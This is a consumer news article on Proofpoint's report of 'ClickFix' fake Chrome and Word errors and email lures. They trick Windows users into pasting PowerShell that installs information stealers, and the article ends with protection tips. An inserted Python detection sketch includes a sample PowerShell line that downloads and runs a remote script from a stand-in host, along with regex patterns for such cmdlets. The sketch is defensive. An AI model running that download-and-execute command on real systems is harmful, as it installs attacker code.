


Fake software fixes fuel money-stealing malware threat

Online protection company Proofpoint has warned that new advanced malware masquerading as Google Chrome and Microsoft could steal money from Windows device owners. Several cybercriminal groups are using the malware, including some known for sending spam emails that infect computers.

The malware poses as fake updates for internet browsers like Chrome to trick users into downloading harmful code that, once on their computers, gives hackers access to cryptocurrency, sensitive files, and personal information.


How does fake update malware work?

Proofpoint spotted large-scale distribution of the malware this month, but the online protection company believes the campaign has been ongoing since March 2024. The malware poses as fake Google Chrome, Word and OneDrive errors to trick users into downloading the harmful code. These errors prompt visitors to click a button to copy a PowerShell “fix” to their clipboard and then paste it into a run dialog or PowerShell prompt to run it.

“While the attack chain requires significant user interaction to be successful, social engineering can be clever, simultaneously presenting a real problem and what appears to be a solution, encouraging users to take action without considering the risks,” Proofpoint warns.

When the PowerShell script is executed, it checks if the device is a valid target and then downloads an additional payload. These steps include clearing the DNS cache, deleting the clipboard contents, displaying a fake message, and downloading another remote PowerShell script.
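Defenders can look for that combination of steps in PowerShell script block logs. The sketch below is an added example, not code from Proofpoint or the original article; the regexes, host names and sample events are constructed assumptions.

```python
import re

# Behaviours the article attributes to the pasted "fix" script.
# The regexes are illustrative assumptions, not Proofpoint signatures.
BEHAVIOURS = {
    "dns_cache_clear": re.compile(r"ipconfig\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_overwrite": re.compile(r"Set-Clipboard\b", re.I),
    "remote_download": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString)\b", re.I),
    "run_downloaded": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
}

def score_script(text):
    """Return the sorted list of behaviours found in one script block."""
    return sorted(name for name, rx in BEHAVIOURS.items() if rx.search(text))

def triage(events, threshold=3):
    """Return (host, hits) for events that combine several behaviours.

    A single behaviour (a helpdesk DNS flush, an admin download) is common
    and benign; the signal is a remote download seen together with the
    clean-up steps in the same script block.
    """
    flagged = []
    for ev in events:
        hits = score_script(ev["script"])
        if len(hits) >= threshold and "remote_download" in hits:
            flagged.append((ev["host"], hits))
    return flagged

# Constructed sample events, shaped like PowerShell script block log records.
SAMPLE_EVENTS = [
    {"host": "WS-014", "script": "ipconfig /flushdns; Set-Clipboard -Value ' '; "
                                 "iex (iwr 'https://example.invalid/fix.ps1')"},
    {"host": "WS-022", "script": "ipconfig /flushdns"},  # helpdesk step
    {"host": "SRV-003", "script": "Invoke-WebRequest https://example.invalid/agent.msi "
                                  "-OutFile C:\\Temp\\agent.msi"},  # admin download
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, hits)
```

Only WS-014 is flagged; the threshold and patterns need tuning against the legitimate scripts in a given environment.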


ClickFix Error Messages (Proofpoint) (Kurt “Cyberguy” Knutson)


Cryptocurrency theft

This second script checks if it is running on a virtual machine before downloading an information stealer. Once everything is ready, the hacker has access to the victim’s cryptocurrency. This scheme redirects the victim’s funds to the hacker instead of the intended recipient.

Alternative attack method: Email lures

Proofpoint notes that bad actors are also using another method called “email lures” to install malicious software. Typically, emails that appear work- or corporate-related contain HTML files that resemble Microsoft Word. These emails prompt users to install the “Word Online” extension to properly view the document.

Similar to the method above, users are prompted to open PowerShell and copy the malicious code. According to Proofpoint, this deceptive “campaign” has been widespread. The company said, “The campaign included more than 100,000 messages, targeting thousands of organizations around the world.”


HTML attachment with instructions to copy and paste PowerShell that leads to the installation of malware (Proofpoint) (Kurt “Cyberguy” Knutson)


5 ways to protect yourself from malicious software

Fake Chrome and Microsoft Word malware creates a sense of urgency, leading users to click on links and unknowingly put their devices at risk. There are steps you can take to protect yourself from such malware:

1) Deploy powerful antivirus software: The best way to protect yourself from clicking on malicious links that could install malware and access your personal information is to install antivirus protection on all your devices. It will also warn you about phishing emails and ransomware scams. We’ve handpicked the winners of the Best Antivirus Protection of 2024 for Windows, Mac, Android and iOS devices.

2) Use a VPN: To protect against being tracked and having your potential location identified on websites you visit, consider using a VPN. Many sites can read your IP address and, depending on your privacy settings, may be able to see the city you’re connecting from. A VPN disguises your IP address to show a different location. For the best VPN software, check out my expert reviews of the best VPNs for browsing the web privately on your Windows, Mac, Android and iOS devices.

3) Monitor your account: Regularly review your bank statements, credit card statements, and other financial accounts for unauthorized transactions. If you notice any suspicious transactions, report them to your bank or credit card company immediately.

4) Issue a fraud alert: Contact one of the big three credit reporting agencies (Equifax, Experian, or TransUnion) and ask them to place a fraud alert on your credit file. This will make it harder for identity thieves to open new accounts in your name without verification.

5) Enable 2-factor authentication: Enable two-factor authentication whenever possible. It requires a second form of verification, such as a code sent to your mobile phone, in addition to your password, providing an extra layer of security.


Kurt’s key takeaways

Hackers are cleverly designing malware and tricking people into installing it on their devices. This malware specifically targets Windows users, and Windows devices seem to be more susceptible to this type of attack. Recently, a Microsoft flaw in a Windows Wi-Fi driver could allow hackers to take control of your PC; all they need to do is connect to the same Wi-Fi network. Be careful when browsing online or connecting to public Wi-Fi.

How do you verify the authenticity of software before you download and install it on your device? Email us at Cyberguy.com/Contact Us.


Copyright 2024 CyberGuy.com. All Rights Reserved.